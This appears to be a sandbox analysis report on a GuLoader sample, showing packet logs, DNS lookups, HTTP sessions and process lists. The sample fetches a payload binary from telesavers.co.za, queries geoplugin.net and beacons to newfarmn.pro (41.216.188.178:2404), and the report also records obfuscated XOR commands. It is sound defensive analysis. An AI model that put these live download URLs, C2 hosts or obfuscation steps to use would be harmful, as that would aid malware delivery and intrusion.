Oct 8, 2024 16:52:35.808058023 CEST  2404   49737  41.216.188.178  192.168.11.20
Oct 8, 2024 16:52:35.808067083 CEST  49737  2404   192.168.11.20   41.216.188.178
Oct 8, 2024 16:52:35.808067083 CEST  49737  2404   192.168.11.20   41.216.188.178
Oct 8, 2024 16:52:35.808067083 CEST  49737  2404   192.168.11.20   41.216.188.178
Oct 8, 2024 16:52:35.808157921 CEST  2404   49737  41.216.188.178  192.168.11.20
Oct 8, 2024 16:52:35.808231115 CEST  49737  2404   192.168.11.20   41.216.188.178
Oct 8, 2024 16:52:35.808299065 CEST  2404   49737  41.216.188.178  192.168.11.20
Oct 8, 2024 16:52:35.808357000 CEST  2404   49737  41.216.188.178  192.168.11.20
Oct 8, 2024 16:52:35.808399916 CEST  49737  2404   192.168.11.20   41.216.188.178
Oct 8, 2024 16:52:35.808399916 CEST  49737  2404   192.168.11.20   41.216.188.178
Oct 8, 2024 16:52:35.808449030 CEST  2404   49737  41.216.188.178  192.168.11.20
Oct 8, 2024 16:52:35.808506012 CEST  2404   49737  41.216.188.178  192.168.11.20
Oct 8, 2024 16:52:35.808561087 CEST  2404   49737  41.216.188.178  192.168.11.20
Oct 8, 2024 16:52:35.808572054 CEST  49737  2404   192.168.11.20   41.216.188.178
Oct 8, 2024 16:52:35.808640003 CEST  2404   49737  41.216.188.178  192.168.11.20
Oct 8, 2024 16:52:35.808695078 CEST  2404   49737  41.216.188.178  192.168.11.20
Oct 8, 2024 16:52:35.808746099 CEST  49737  2404   192.168.11.20   41.216.188.178
Oct 8, 2024 16:52:35.808746099 CEST  49737  2404   192.168.11.20   41.216.188.178
Oct 8, 2024 16:52:35.808746099 CEST  49737  2404   192.168.11.20   41.216.188.178
Oct 8, 2024 16:52:35.808798075 CEST  2404   49737  41.216.188.178  192.168.11.20
Oct 8, 2024 16:52:35.808856010 CEST  2404   49737  41.216.188.178  192.168.11.20
Oct 8, 2024 16:52:35.808913946 CEST  2404   49737  41.216.188.178  192.168.11.20
Oct 8, 2024 16:52:35.808921099 CEST  49737  2404   192.168.11.20   41.216.188.178
Oct 8, 2024 16:52:35.808988094 CEST  2404   49737  41.216.188.178  192.168.11.20
Oct 8, 2024 16:52:35.809045076 CEST  2404   49737  41.216.188.178  192.168.11.20
Oct 8, 2024 16:52:35.809081078 CEST  49737  2404   192.168.11.20   41.216.188.178
Oct 8, 2024 16:52:35.809081078 CEST  49737  2404   192.168.11.20   41.216.188.178
Oct 8, 2024 16:52:35.809135914 CEST  2404   49737  41.216.188.178  192.168.11.20
Oct 8, 2024 16:52:35.809191942 CEST  2404   49737  41.216.188.178  192.168.11.20
Oct 8, 2024 16:52:35.809251070 CEST  2404   49737  41.216.188.178  192.168.11.20
Oct 8, 2024 16:52:35.809258938 CEST  49737  2404   192.168.11.20   41.216.188.178
Oct 8, 2024 16:52:35.809258938 CEST  49737  2404   192.168.11.20   41.216.188.178
Oct 8, 2024 16:52:35.809334993 CEST  2404   49737  41.216.188.178  192.168.11.20
Oct 8, 2024 16:52:35.809391022 CEST  2404   49737  41.216.188.178  192.168.11.20
Oct 8, 2024 16:52:35.809420109 CEST  49737  2404   192.168.11.20   41.216.188.178
Oct 8, 2024 16:52:35.809420109 CEST  49737  2404   192.168.11.20   41.216.188.178
Oct 8, 2024 16:52:35.809480906 CEST  2404   49737  41.216.188.178  192.168.11.20
Oct 8, 2024 16:52:35.809537888 CEST  2404   49737  41.216.188.178  192.168.11.20
Oct 8, 2024 16:52:35.809590101 CEST  49737  2404   192.168.11.20   41.216.188.178
Oct 8, 2024 16:52:35.809590101 CEST  49737  2404   192.168.11.20   41.216.188.178
Oct 8, 2024 16:52:35.809623957 CEST  2404   49737  41.216.188.178  192.168.11.20
Oct 8, 2024 16:52:35.809684038 CEST  2404   49737  41.216.188.178  192.168.11.20
Oct 8, 2024 16:52:35.809741020 CEST  2404   49737  41.216.188.178  192.168.11.20
Oct 8, 2024 16:52:35.809760094 CEST  49737  2404   192.168.11.20   41.216.188.178
Oct 8, 2024 16:52:35.809760094 CEST  49737  2404   192.168.11.20   41.216.188.178
Oct 8, 2024 16:52:35.809828997 CEST  2404   49737  41.216.188.178  192.168.11.20
Oct 8, 2024 16:52:35.809885979 CEST  2404   49737  41.216.188.178  192.168.11.20
Oct 8, 2024 16:52:35.809931040 CEST  49737  2404   192.168.11.20   41.216.188.178
Oct 8, 2024 16:52:35.809931040 CEST  49737  2404   192.168.11.20   41.216.188.178
Oct 8, 2024 16:52:35.809976101 CEST  2404   49737  41.216.188.178  192.168.11.20
Oct 8, 2024 16:52:35.810033083 CEST  2404   49737  41.216.188.178  192.168.11.20
Oct 8, 2024 16:52:35.810089111 CEST  2404   49737  41.216.188.178  192.168.11.20
Oct 8, 2024 16:52:35.810100079 CEST  49737  2404   192.168.11.20   41.216.188.178
Oct 8, 2024 16:52:35.810100079 CEST  49737  2404   192.168.11.20   41.216.188.178
Oct 8, 2024 16:52:35.810100079 CEST  49737  2404   192.168.11.20   41.216.188.178
Oct 8, 2024 16:52:35.810185909 CEST  2404   49737  41.216.188.178  192.168.11.20
Oct 8, 2024 16:52:35.810241938 CEST  2404   49737  41.216.188.178  192.168.11.20
Oct 8, 2024 16:52:35.810269117 CEST  49737  2404   192.168.11.20   41.216.188.178
Oct 8, 2024 16:52:35.810323954 CEST  2404   49737  41.216.188.178  192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.810379982 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.810439110 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.810447931 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.810447931 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.810447931 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.810534000 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.810576916 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.810609102 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.810657024 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.810713053 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.810767889 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.810782909 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.810784101 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.810784101 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.810868979 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.810925007 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.810955048 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.811012030 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.811069965 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.811120987 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.811120987 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.811120987 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.811120987 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.811175108 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.811240911 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.811297894 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.811352968 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.811377048 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.811378002 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.811378002 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.811451912 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.811505079 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.811546087 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.811585903 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.811640978 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.811696053 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.811717987 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.811717987 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.811718941 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.811718941 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.811805010 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.811861992 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.811888933 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.811888933 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.811888933 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.811963081 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.812020063 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.812041998 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.812099934 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.812155962 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.812218904 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.812218904 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.812295914 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.812355042 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.812383890 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.812383890 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.812448025 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.812500954 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.812551022 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.812577963 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.812637091 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.812691927 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.812726021 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.812726021 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.812726021 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.812726021 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.812792063 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.812892914 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.812989950 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.843827963 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.843911886 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.843965054 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.844162941 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.980376959 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.980454922 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.980516911 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.980575085 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.980595112 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.980631113 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.980688095 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.980743885 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.980798006 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.980853081 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.980910063 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.980936050 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.980964899 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.981034040 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.981122971 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.981182098 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.981267929 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.981339931 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.981384993 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.981478930 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.981550932 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.981628895 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.981628895 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.981628895 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.981709003 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.981771946 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.981796026 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.981796980 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.981846094 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.981903076 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.981901884 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.981959105 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.982013941 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.982021093 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.982070923 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.982121944 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.982121944 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.982126951 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.982182026 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:55:51.958020926 CEST24044973641.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:56:21.749273062 CEST24044973641.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:56:21.751003027 CEST497362404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:56:21.988982916 CEST24044973641.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:56:51.785502911 CEST24044973641.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:56:51.788352966 CEST497362404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:56:52.020200014 CEST24044973641.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:57:21.818101883 CEST24044973641.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:57:21.820553064 CEST497362404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:57:22.050735950 CEST24044973641.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:57:51.866343975 CEST24044973641.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:57:51.868998051 CEST497362404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:57:52.095356941 CEST24044973641.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:58:21.904393911 CEST24044973641.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:58:21.905740976 CEST497362404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:58:22.140665054 CEST24044973641.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:58:51.955459118 CEST24044973641.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:58:51.956671000 CEST497362404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:58:52.186795950 CEST24044973641.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:59:21.995789051 CEST24044973641.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:59:21.997529030 CEST497362404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:59:22.232938051 CEST24044973641.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:59:52.037161112 CEST24044973641.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:59:52.038372993 CEST497362404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:59:52.262279987 CEST24044973641.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 17:00:22.058478117 CEST24044973641.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 17:00:22.058923006 CEST497362404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 17:00:22.293530941 CEST24044973641.216.188.178192.168.11.20
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 8, 2024 16:52:22.640477896 CEST | 58939 | 53 | 192.168.11.20 | 1.1.1.1
Oct 8, 2024 16:52:23.388475895 CEST | 53 | 58939 | 1.1.1.1 | 192.168.11.20
Oct 8, 2024 16:52:32.695863008 CEST | 55386 | 53 | 192.168.11.20 | 1.1.1.1
Oct 8, 2024 16:52:32.795903921 CEST | 53 | 55386 | 1.1.1.1 | 192.168.11.20
Oct 8, 2024 16:52:34.024312973 CEST | 61542 | 53 | 192.168.11.20 | 1.1.1.1
Oct 8, 2024 16:52:34.121969938 CEST | 53 | 61542 | 1.1.1.1 | 192.168.11.20
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 8, 2024 16:52:22.640477896 CEST | 192.168.11.20 | 1.1.1.1 | 0xbbcc | Standard query (0) | telesavers.co.za | A (IP address) | IN (0x0001) | false
Oct 8, 2024 16:52:32.695863008 CEST | 192.168.11.20 | 1.1.1.1 | 0x56aa | Standard query (0) | newfarmn.pro | A (IP address) | IN (0x0001) | false
Oct 8, 2024 16:52:34.024312973 CEST | 192.168.11.20 | 1.1.1.1 | 0xb955 | Standard query (0) | geoplugin.net | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 8, 2024 16:52:23.388475895 CEST | 1.1.1.1 | 192.168.11.20 | 0xbbcc | No error (0) | telesavers.co.za | (none) | 102.65.21.26 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 16:52:32.795903921 CEST | 1.1.1.1 | 192.168.11.20 | 0x56aa | No error (0) | newfarmn.pro | (none) | 41.216.188.178 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 16:52:34.121969938 CEST | 1.1.1.1 | 192.168.11.20 | 0xb955 | No error (0) | geoplugin.net | (none) | 178.237.33.50 | A (IP address) | IN (0x0001) | false
• telesavers.co.za
• geoplugin.net
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.11.20 | 49740 | 178.237.33.50 | 80 | 4464 | C:\Users\user\Desktop\asXlZG3aW6.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 16:52:34.293272018 CEST | 71 | OUT | GET /json.gp HTTP/1.1
Host: geoplugin.net
Cache-Control: no-cache
Oct 8, 2024 16:52:34.468440056 CEST | 1173 | IN | HTTP/1.1 200 OK
date: Tue, 08 Oct 2024 14:52:34 GMT
server: Apache
content-length: 965
content-type: application/json; charset=utf-8
cache-control: public, max-age=300
access-control-allow-origin: *
Data Ascii:
{
  "geoplugin_request":"191.96.150.187",
  "geoplugin_status":200,
  "geoplugin_delay":"1ms",
  "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",
  "geoplugin_city":"New York",
  "geoplugin_region":"New York",
  "geoplugin_regionCode":"NY",
  "geoplugin_regionName":"New York",
  "geoplugin_areaCode":"",
  "geoplugin_dmaCode":"501",
  "geoplugin_countryCode":"US",
  "geoplugin_countryName":"United States",
  "geoplugin_inEU":0,
  "geoplugin_euVATrate":false,
  "geoplugin_continentCode":"NA",
  "geoplugin_continentName":"North America",
  "geoplugin_latitude":"40.7123",
  "geoplugin_longitude":"-74.0068",
  "geoplugin_locationAccuracyRadius":"20",
  "geoplugin_timezone":"America\/New_York",
  "geoplugin_currencyCode":"USD",
  "geoplugin_currencySymbol":"$",
  "geoplugin_currencySymbol_UTF8":"$",
  "geoplugin_currencyConverter":0
}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.11.20 | 49735 | 102.65.21.26 | 443 | 4464 | C:\Users\user\Desktop\asXlZG3aW6.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-08 14:52:24 UTC | 177 | OUT | GET /EsbmqCxkb162.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Host: telesavers.co.za
Cache-Control: no-cache
2024-10-08 14:52:24 UTC | 249 | IN | HTTP/1.1 200 OK
Date: Tue, 08 Oct 2024 14:52:24 GMT
Server: Apache
Upgrade: h2,h2c
Connection: Upgrade, close
Last-Modified: Thu, 12 Sep 2024 07:12:43 GMT
Accept-Ranges: bytes
Content-Length: 494656
Content-Type: application/octet-stream
                                                                                                                                                                                  Data Ascii: ul`ZcI4wP)PV'v:qSlCLK>vci+`3sK>:;FaG~P<-Xj6gG:xskWp3"Zo-m46Ok$hC?_ $YiL)g]1l\'Q=&E/B{/hw@||j



Target ID: 0
Start time: 10:51:32
Start date: 08/10/2024
Path: C:\Users\user\Desktop\asXlZG3aW6.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\asXlZG3aW6.exe"
Imagebase: 0x400000
File size: 292'592 bytes
MD5 hash: 51BFAB682069E4E7A2BA7B8379D3927B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_GuLoader_3, Description: Yara detected GuLoader, Source: 00000000.00000002.21759600322.00000000004A4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.21761784338.0000000004742000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: true

Target ID: 1
Start time: 10:51:32
Start date: 08/10/2024
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline: cmd.exe /c set /a "250^177"
Imagebase:
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 2
Start time: 10:51:32
Start date: 08/10/2024
Path: C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size: 875'008 bytes
MD5 hash: 81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 3
Start time: 10:51:32
Start date: 08/10/2024
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline: cmd.exe /c set /a "244^177"
Imagebase:
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 4
Start time: 10:51:32
Start date: 08/10/2024
Path: C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size: 875'008 bytes
MD5 hash: 81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 5
Start time: 10:51:32
Start date: 08/10/2024
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline: cmd.exe /c set /a "227^177"
Imagebase:
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 6
Start time: 10:51:32
Start date: 08/10/2024
Path: C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size: 875'008 bytes
MD5 hash: 81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 8
Start time: 10:51:32
Start date: 08/10/2024
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): false
Commandline: cmd.exe /c set /a "255^177"
Imagebase: 0x7ff77eef0000
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 9
Start time: 10:51:32
Start date: 08/10/2024
Path: C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size: 875'008 bytes
MD5 hash: 81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 10
Start time: 10:51:33
Start date: 08/10/2024
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline: cmd.exe /c set /a "244^177"
Imagebase:
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

                                                                                                                                                                                  Target ID:11
                                                                                                                                                                                  Start time:10:51:33
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:875'008 bytes
                                                                                                                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
